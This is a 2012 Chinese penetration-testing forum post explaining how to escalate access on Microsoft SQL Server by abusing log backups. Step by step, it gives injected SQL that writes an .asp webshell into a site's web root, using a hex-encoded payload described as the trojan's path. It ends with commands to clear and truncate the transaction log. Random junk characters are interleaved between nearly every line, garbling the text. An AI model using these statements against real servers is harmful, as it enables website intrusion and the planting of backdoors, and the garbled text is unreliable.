中国网络渗透测试联盟
标题:
差异备份提权
[打印本页]
作者:
admin
时间:
2012-9-15 14:38
标题:
差异备份提权
select * from master.dbo.sysdatabases 列出所有列的记录
$ e, Y! G4 ~: F
5 y$ I1 N- R/ g
select name from master.dbo.sysdatabases 仅列出name列的记录
- X7 t# h' H+ u( M
( h l2 `- \1 c/ D9 ]
注意:可以利用log和数据库备份两上都行,log备份不成功用数据库备份
# ~# D6 h( R( ?$ P9 W
0 ^1 v4 Y( j/ i( c
alter database 数据库名 set RECOVERY FULL--
- L# H4 D* @0 f- Y
! r7 x2 O$ }$ z8 ~: m) E5 ?
create table cmd (a image)-- \**cmd是创建的临时表
* p" D% D0 V8 b5 N8 f/ j' c
3 d* C# c2 I; S) |( V. Y
backup log 数据库名 to disk = 'f:\wwwroot\1.asp' with init--
% q8 M b( l G- P# ]
0 q! j' ~( B, X) l W; J; Y: C
insert into cmd(a) values (0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)--
1 ]1 O0 l% }3 M8 ^8 x. Q5 V4 H
- b; ], g L: U. K/ A
//木马存放路径(转换16进制0x130a0d0a替换原来0x最后添加0d0a要多加几个)
; m o- ?* m/ @' |1 d5 {
z7 H$ D, W. i6 u% Z
backup log 数据库名 to disk = 'f:\wwwroot\1.asp'-- (要备份的目录)
1 Q9 i) T. U) S. w) c' N& C: J
9 r3 n6 m& G+ \& f% }
drop table cmd--
" Z S# v7 {4 ?8 n! h) y- i6 ^
. ]0 O1 N0 p3 ?. z9 g* _
' H" T4 O% T6 G; z @3 q3 x
f:\
0 P: R3 Z: l8 S8 s/ ^. B1 E
16进制转换(0x130a0d0a663A5CCDF8D5BE5CCDF8CDA8C6F3D2B5425C626C75656B6973735C7765625C312E6173700d0a)
- m- P: L8 O1 J. `5 L
0 i; A7 e9 k3 U2 S/ \& F6 r5 {
最好多加几个回车0d0a,要不会出错哈
8 t6 b Y5 J2 R8 ^; @1 _0 x& A
, {8 J! b1 ^5 a8 t/ B0 v
+ d' S7 h1 |9 i' k8 \0 K3 V
SQL Server日志清空方法
- Z1 j: k4 @* ]; H: L3 b( V- Z
& g' J: ? ^* @* i
在查询分析器中顺序执行以下三步,其中 databasename 为你的数据库文件名
: x! d, n- J- Y; j2 w/ N
1.清空日志:DUMP TRANSACTION databasename WITH NO_LOG
6 k3 D! G5 g7 h8 g
7 C- Q( S! k2 n0 ], q
2.截断事务日志:BACKUP LOG databasename WITH NO_LOG
: l& Z z; g3 e4 ?
- }; M5 F! W' `$ U, j2 g6 f4 r
3.收缩数据库:DBCC SHRINKDATABASE(databasename)
5 L" ~5 w9 R F2 n' V; o' y. `; ^5 [
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2